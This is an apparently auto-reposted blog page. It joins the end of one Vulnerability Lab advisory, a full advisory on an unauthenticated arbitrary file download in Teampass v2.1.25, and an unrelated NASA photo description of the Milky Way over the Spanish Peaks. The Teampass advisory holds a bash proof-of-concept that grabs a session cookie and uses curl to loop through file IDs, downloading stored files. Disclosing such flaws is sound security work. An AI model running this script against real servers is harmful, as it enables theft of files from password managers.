parse and encode of the vulnerable firstname, lastname and company values in the add POST method request. Disallow the usage of special chars in the name values, encode the inputs as well to prevent further exploitation. Encode as well outgoing emails to ensure that no malicious script code injection can take place with application-side attack vector. Security Risk: ============== The security risk of the filter bypass issue and application-side arbitrary script code injection web vulnerability is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://ift.tt/1jnqRwA] [http://ift.tt/1TDrAB7.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-lab.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
Source: Gmail -> IFTTT-> Blogger
[FD] Teampass v2.1.25 - Arbitrary File Download Vulnerability
Document Title: =============== Teampass v2.1.25 - Arbitrary File Download Vulnerability References (Source): ==================== http://ift.tt/1Tk5qCD Release Date: ============= 2016-05-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1843 Common Vulnerability Scoring System: ==================================== 8.1 Product & Service Introduction: =============================== TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. (Copy of the Homepage: http://teampass.net/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an arbitrary file download vulnerability in the Teampass Password Manager v2.1.25 web-application. Vulnerability Disclosure Timeline: ================================== 2016-05-11: Researcher Notification & Coordination (Peter Kok) 2016-05:12 Vendor Notification (Teampass Security Team) 2016-05-13: Vendor Response/Feedback (Teampass Security Team) 2016-05-15: Vendor Fix/Patch (Teampass Developer Team) 2016-05-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Nils Laumaillé Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An arbitrary file download web vulnerability has been discovered in the Teampass Password Manager v2.1.25 web-application. The arbitrary file download vulnerability allows remote attackers to unauthorized download files via GET method request. The web vulnerability is located in the `downloadFile.php` file. Remote attackers are able to download internal uploaded files without any authentication. The web vulnerability can be exploited by remote attackers without user interaction. The issue is located on the application-side of the web-application and the request method to access is GET. The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.1. Exploitation of the arbitrary file download vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the arbitrary file download web vulnerability results in unauthorized file access and information disclosure. Request Method(s): [+] GET Vulnerable File(s): [+] downloadFile.php Vulnerable Parameter(s): [+] fileid Proof of Concept (PoC): ======================= The arbitrary file download web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reprodcue the vulnerability ... 1. Open a browser and visit http://ift.tt/1TyWfL8 which will display the message "Hacking attempt..." 2. Get a cookie by visiting the login page http://ift.tt/1OVXeZ8, you don't have to authenticate only visit this page 3. Again visit http://ift.tt/1TyWfL8, now that the cookie is set there is no "Hacking attempt..." message Files which are attached to items created in teampass can now be downloaded with the url http://ift.tt/1TyW7eG Just change the fileid in the url to download different stored files PoC: Exploit #!/bin/bash COOKIE=/tmp/teampass.cookie if [ ! "$1" ] then echo "Usage: $0 [url]" exit 0 fi #Get a valid cookie curl -c $COOKIE -s "$1" >/dev/null #get stored files with fileid 1 through 100 for i in $(seq 1 100) do curl -b $COOKIE "$1/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=$i" -s -o file-$i if [ -s "file-$i" ] then #display the filetype file file-$i else #remove file if empty rm -f file-$i fi done rm -f $COOKIE exit 0 Solution - Fix & Patch: ======================= The arbitrary file download vulnerability can be patched by denying access to the `downloadFile.php` without authentication. Note: The manufacturer fixed the vulnerability and an update is available for download in version 2.1.26. URL: http://ift.tt/1OVXjfq Security Risk: ============== The security risk of the arbitrary file download web vulnerability in the Teampass Password Manager web-application is estimated as high. (CVSS 8.1) Credits & Authors: ================== Peter Kok - [http://ift.tt/1TyWiqi] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-lab.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Milky Way Over the Spanish Peaks
That's not lightning, and it did not strike between those mountains. The diagonal band is actually the central band of our Milky Way Galaxy, while the twin peaks are actually called the Spanish Peaks -- but located in Colorado, USA. Although each Spanish peak is composed of a slightly different type of rock, both are approximately 25 million years old. This serene yet spirited image composite was meticulously created by merging a series of images all taken from the same location on one night and early last month. In the first series of exposures, the background sky was built up, with great detail being revealed in the Milky Way dust lanes as well as the large colorful region surrounding the star Rho Ophiuchus just right of center. One sky image, though, was taken using a fogging filter so that brighter stars would appear more spread out and so more prominent. As a bonus, the planets Mars and Saturn are placed right above peaks and make an orange triangle with the bright star Antares. Later that night, after the moonrise, the Moon itself naturally illuminated the snow covered mountain tops. via NASA http://ift.tt/1TwOTI0
Subscribe to:
Posts (Atom)